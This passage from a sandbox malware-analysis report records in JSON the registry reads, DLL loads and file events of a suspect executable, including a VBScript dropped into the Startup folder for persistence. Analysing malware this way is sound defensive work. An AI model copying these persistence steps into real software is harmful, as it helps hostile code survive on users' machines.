"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\EnableExtensions", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,017", "eid": 453, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\DelayedExpansion", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,017", "eid": 454, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\DefaultColor", "content": "0" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,017", "eid": 455, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\CompletionChar", "content": "9" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,017", "eid": 456, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\PathCompletionChar", "content": "9" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,017", "eid": 457, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\AutoRun", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,017", "eid": 458, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,017", "eid": 459, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,032", "eid": 460, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,032", "eid": 461, "data": { "file": "KERNEL32.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "write", "object": "file", "timestamp": "2025-03-02 21:32:29,032", "eid": 462, "data": { "file": "C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,032", "eid": 463, "data": { "file": "mscoree.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,048", "eid": 464, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,048", "eid": 465, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:29,048", "eid": 466, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableUmpdBufferSizeCheck", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,048", "eid": 467, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,048", "eid": 468, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:29,048", "eid": 469, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:31,185", "eid": 470, "data": { "file": "C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll", "pathtofile": null, "moduleaddress": "0x73340000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:31,201", "eid": 471, "data": { "file": "C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll", "pathtofile": null, "moduleaddress": "0x73340000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:31,357", "eid": 472, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:31,404", "eid": 473, "data": { "file": "oleaut32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:31,404", "eid": 474, "data": { "file": "oleaut32.dll", "pathtofile": null, "moduleaddress": "0x76d90000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:31,420", "eid": 475, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:31,420", "eid": 476, "data": { "file": "user32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:31,435", "eid": 477, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:31,654", "eid": 478, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:31,685", "eid": 479, "data": { "file": "user32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,232", "eid": 480, "data": { "file": "msimg32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,232", "eid": 481, "data": { "file": "msimg32.dll", "pathtofile": null, "moduleaddress": "0x73fc0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,232", "eid": 482, "data": { "file": "gdi32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,514", "eid": 483, "data": { "file": "version.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,529", "eid": 484, "data": { "file": "version.dll", "pathtofile": null, "moduleaddress": "0x74a30000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,545", "eid": 485, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,764", "eid": 486, "data": { "file": "advapi32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,795", "eid": 487, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,810", "eid": 488, "data": { "file": "oleaut32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,842", "eid": 489, "data": { "file": "comctl32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,842", "eid": 490, "data": { "file": "imm32.dll", "pathtofile": null, "moduleaddress": "0x75730000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,842", "eid": 491, "data": { "file": "comctl32.dll", "pathtofile": null, "moduleaddress": "0x73910000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,920", "eid": 492, "data": { "file": "comdlg32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,920", "eid": 493, "data": { "file": "comdlg32.dll", "pathtofile": null, "moduleaddress": "0x755a0000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,935", "eid": 494, "data": { "file": "SHFolder.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:32,935", "eid": 495, "data": { "file": "SHFolder.dll", "pathtofile": null, "moduleaddress": "0x73900000" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,279", "eid": 496, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,279", "eid": 497, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,279", "eid": 498, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,279", "eid": 499, "data": { "file": "C:\\Windows\\System32\\uxtheme.dll", "pathtofile": null, "moduleaddress": "0x74e80000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,279", "eid": 500, "data": { "file": "oleaut32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,295", "eid": 501, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes\\MS Shell Dlg 2", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,295", "eid": 502, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes\\MS Shell Dlg 2", "content": "Tahoma" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,295", "eid": 503, "data": { "file": "USER32.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,404", "eid": 504, "data": { "file": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,404", "eid": 505, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest", "content": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,404", "eid": 506, "data": { "file": "USER32", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,404", "eid": 507, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx", "content": "kernel32.dll" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,404", "eid": 508, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,404", "eid": 509, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es-ES", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,404", "eid": 510, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es", "content": "{0000002B-57EE-1E5C-00B4-D0000BB1E11E}" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,404", "eid": 511, "data": { "file": "comctl32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,404", "eid": 512, "data": { "file": "User32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,404", "eid": 513, "data": { "file": "uxtheme.dll", "pathtofile": null, "moduleaddress": "0x74e80000" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,404", "eid": 514, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\Disable", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,404", "eid": 515, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\DataFilePath", "content": "C:\\Windows\\Fonts\\staticcache.dat" } }, { "event": "read", "object": "file", "timestamp": "2025-03-02 21:32:33,404", "eid": 516, "data": { "file": "C:\\Windows\\Fonts\\StaticCache.dat" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,404", "eid": 517, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 518, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane1", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 519, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane2", "content": "SimSun-ExtB" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 520, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane3", "content": "SimSun-ExtG" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 521, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane4", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 522, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane5", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 523, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane6", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 524, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane7", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 525, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane8", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 526, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane9", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 527, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane10", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 528, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane11", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 529, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane12", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 530, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane13", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 531, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane14", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 532, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane15", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 533, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane16", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,420", "eid": 534, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,435", "eid": 535, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,435", "eid": 536, "data": { "file": "LPK", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,435", "eid": 537, "data": { "file": "GDI32", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,451", "eid": 538, "data": { "file": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,451", "eid": 539, "data": { "file": "comctl32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,451", "eid": 540, "data": { "file": "user32", "pathtofile": null, "moduleaddress": "0x76610000" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:32:33,451", "eid": 541, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes\\MS Sans Serif", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,451", "eid": 542, "data": { "file": "USER32", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,451", "eid": 543, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,467", "eid": 544, "data": { "file": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:32:33,467", "eid": 545, "data": { "file": "user32", "pathtofile": null, "moduleaddress": "0x76610000" } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:33:16,217", "eid": 546, "data": { "file": "api-ms-win-eventing-provider-l1-1-0.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:33:16,217", "eid": 547, "data": { "file": "api-ms-win-core-synch-l1-2-0.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-03-02 21:33:16,217", "eid": 548, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 549, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Category", "content": "4" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 550, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Name", "content": "Local AppData" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 551, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\ParentFolder", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 552, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Description", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 553, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\RelativePath", "content": "AppData\\Local" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 554, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\ParsingName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 555, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\InfoTip", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 556, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\LocalizedName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 557, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Icon", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 558, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Security", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 559, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\StreamResource", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 560, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\StreamResourceType", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 561, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\LocalRedirectOnly", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 562, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Roamable", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 563, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PreCreate", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 564, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Stream", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 565, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PublishExpandedPath", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 566, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\DefinitionFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 567, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Attributes", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 568, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\FolderTypeID", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 569, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\InitFolderHandler", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-03-02 21:33:16,217", "eid": 570, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData", "content": "%USERPROFILE%\\AppData\\Local" } }, { "event": "create", "object": "dir", "timestamp": "2025-03-02 21:33:16,217", "eid": 571, "data": { "file": "C:\\Users\\pacop\\AppData\\Local\\Chrome" } } ], "encryptedbuffers": [] }, "debug": { "log": "2025-02-20 10:20:15,959 [root] INFO: Date set to: 20250302T21:32:13, timeout set to: 180\n2025-03-02 21:32:14,086 [root] DEBUG: Starting analyzer from: C:\\tmp4qgvoq2_\n2025-03-02 21:32:14,086 [root] DEBUG: Storing results at: C:\\DvvlnNLlY\n2025-03-02 21:32:14,086 [root] DEBUG: Pipe server name: \\\\.\\PIPE\\bTLpqc\n2025-03-02 21:32:14,086 [root] DEBUG: Python path: C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32\n2025-03-02 21:32:14,086 [root] INFO: analysis running as an admin\n2025-03-02 21:32:14,086 [root] INFO: analysis package specified: \"exe\"\n2025-03-02 21:32:14,086 [root] DEBUG: importing analysis package module: \"modules.packages.exe\"...\n2025-03-02 21:32:14,086 [root] DEBUG: imported analysis package \"exe\"\n2025-03-02 21:32:14,086 [root] DEBUG: initializing analysis package \"exe\"...\n2025-03-02 21:32:14,086 [lib.common.common] INFO: wrapping\n2025-03-02 21:32:14,086 [lib.core.compound] INFO: C:\\Users\\pacop\\AppData\\Local\\Temp already exists, skipping creation\n2025-03-02 21:32:14,086 [root] DEBUG: New location of moved file: C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\n2025-03-02 21:32:14,086 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option\n2025-03-02 21:32:14,086 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option\n2025-03-02 21:32:14,086 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option\n2025-03-02 21:32:14,086 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option\n2025-03-02 21:32:14,101 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.browser\"\n2025-03-02 21:32:14,117 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.digisig\"\n2025-03-02 21:32:14,117 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.disguise\"\n2025-03-02 21:32:14,132 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.human\"\n2025-03-02 21:32:14,132 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'\n2025-03-02 21:32:14,164 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'\n2025-03-02 